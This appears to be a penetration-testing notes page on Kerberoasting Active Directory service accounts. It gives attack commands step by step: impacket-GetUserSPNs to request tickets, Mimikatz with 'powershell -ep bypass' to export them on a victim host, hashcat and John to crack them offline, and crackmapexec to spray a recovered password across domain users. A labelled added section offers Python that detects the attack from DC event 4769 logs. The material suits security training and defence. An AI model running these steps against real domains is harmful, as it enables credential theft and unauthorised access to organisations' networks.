# Kerberoast

## Theory

Kerberoasting is an extremely common attack in Active Directory environments. It targets Active Directory accounts that have an SPN **(Service Principal Name)** set; typical examples are service accounts such as those used by IIS or MSSQL.

Kerberoasting involves requesting a Kerberos service ticket (TGS) from a Windows domain machine or a Kali box, using a tool such as `GetUserSPNs.py`. The weakness is that once the **DC** looks up the target **SPN**, it encrypts the **TGS** with the **NTLM password hash** of the targeted service account, so whoever holds the ticket can try to crack that hash offline.
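On the defender's side, the same mechanism is what makes Kerberoasting visible: every service ticket request is logged on the DC as Security event 4769, and a ticket keyed with the NT hash carries RC4 encryption type `0x17`, so one account pulling RC4 tickets for many different SPNs in a short burst stands out against routine AES traffic. The following is an added example, not part of the original page, that runs that check over constructed 4769 records (field names follow the real EventData; the 5-minute window and 3-service threshold are assumptions):

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4769 (service ticket requested) records.
# Keys mirror the EventData field names a DC writes; times are ISO 8601.
def ev(time, user, service, etype, ip):
    return {"time": time, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip}

SAMPLE_4769 = [
    ev("2024-01-10T09:00:01", "jdoe@CORP.LOCAL", "svc_sql", "0x17", "10.0.0.25"),
    ev("2024-01-10T09:00:02", "jdoe@CORP.LOCAL", "svc_iis", "0x17", "10.0.0.25"),
    ev("2024-01-10T09:00:02", "jdoe@CORP.LOCAL", "svc_backup", "0x17", "10.0.0.25"),
    ev("2024-01-10T09:00:03", "jdoe@CORP.LOCAL", "svc_report", "0x17", "10.0.0.25"),
    ev("2024-01-10T09:15:00", "asmith@CORP.LOCAL", "svc_sql", "0x12", "10.0.0.40"),  # AES, routine
    ev("2024-01-10T10:00:00", "WS01$@CORP.LOCAL", "krbtgt", "0x12", "10.0.0.50"),  # TGT, ignored
    ev("2024-01-10T10:00:01", "bob@CORP.LOCAL", "svc_sql", "0x17", "10.0.0.60"),  # one RC4 ticket: under threshold
]

RC4_ETYPES = {"0x17", "0x18"}  # rc4-hmac / rc4-hmac-exp: keyed with the NT hash

def is_roastable_service(name):
    # Skip the TGT service and computer accounts; Kerberoasting goes after user SPNs.
    return name.lower() != "krbtgt" and not name.endswith("$")

def find_kerberoast_suspects(events, window=timedelta(minutes=5), min_distinct=3):
    """Return {requester: sorted service names} for every account that obtained
    RC4 service tickets for at least `min_distinct` distinct services inside `window`."""
    by_user = defaultdict(list)
    for e in events:
        if e["TicketEncryptionType"].lower() in RC4_ETYPES and is_roastable_service(e["ServiceName"]):
            by_user[e["TargetUserName"]].append((datetime.fromisoformat(e["time"]), e["ServiceName"]))
    suspects = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):  # sliding window over this user's requests
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= min_distinct:
                suspects[user] = sorted(services)
                break
    return suspects

if __name__ == "__main__":
    for user, services in find_kerberoast_suspects(SAMPLE_4769).items():
        print(f"ALERT {user}: RC4 service tickets for {len(services)} services: {', '.join(services)}")
```

Event 4769 is only written when "Audit Kerberos Service Ticket Operations" is enabled on the DCs, and moving service accounts to AES-only keys (or to group Managed Service Accounts) removes the RC4 tickets this check keys on.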

## Having a Credential

### Step 1: Impacket-GetUserSPNs

Use `impacket-GetUserSPNs` to gather SPNs and request the tickets. This requires a valid domain credential:

```shell
impacket-GetUserSPNs '<domain>/<username>:<password>' -dc-ip <target_ip> -request
```

### Step 2: Crack the TGS ticket with hashcat

Save the TGS ticket as `hash.txt` and crack it with hashcat mode 13100:

```shell
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
```

## Having a Shell

### Step 1: GetUserSPNs

Transfer the `GetUserSPNs.ps1` script from the following GitHub repo to the victim machine and run it:

<https://github.com/nidem/kerberoast>

```powershell
powershell -ep bypass
.\GetUserSPNs.ps1
```

### Step 2: Request service tickets

Execute the following two commands in PowerShell:

```powershell
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<SPN>'
```

Or request the ticket with Mimikatz:

```powershell
.\mimikatz.exe
    privilege::debug
    kerberos::ask /target:<spn>
```

### Step 3: Export service ticket to kirbi file

Transfer `/usr/share/windows-resources/mimikatz/x64/mimikatz.exe` to the victim machine and export the service ticket:

```powershell
.\mimikatz.exe
    privilege::debug
    kerberos::list /export
```

Download the kirbi file to Kali.

### Step 4: Crack the kirbi file with John

Convert the kirbi file to John's format:

```shell
python3 /usr/share/windows-resources/kerberoast/kirbi2john.py '<kirbi_file>' > hash.txt
```

Note that this `kirbi2john.py` script is also from the "kerberoast" GitHub repo mentioned above. Don't use the Kali built-in `kirbi2john`; it did not work at the time of writing.

Crack the hash with John:

```shell
john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

## Password Spray

Note that users might reuse the same password for different accounts. Once you obtain a plaintext password, spray it against the username list you collected from `net user /domain` with crackmapexec:

```shell
crackmapexec smb <target_ip> -u users.txt -p <password>
```

## Reference

{% embed url="https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html#kerberoast" %}
How To Attack Kerberos 101 - m0chan
{% endembed %}
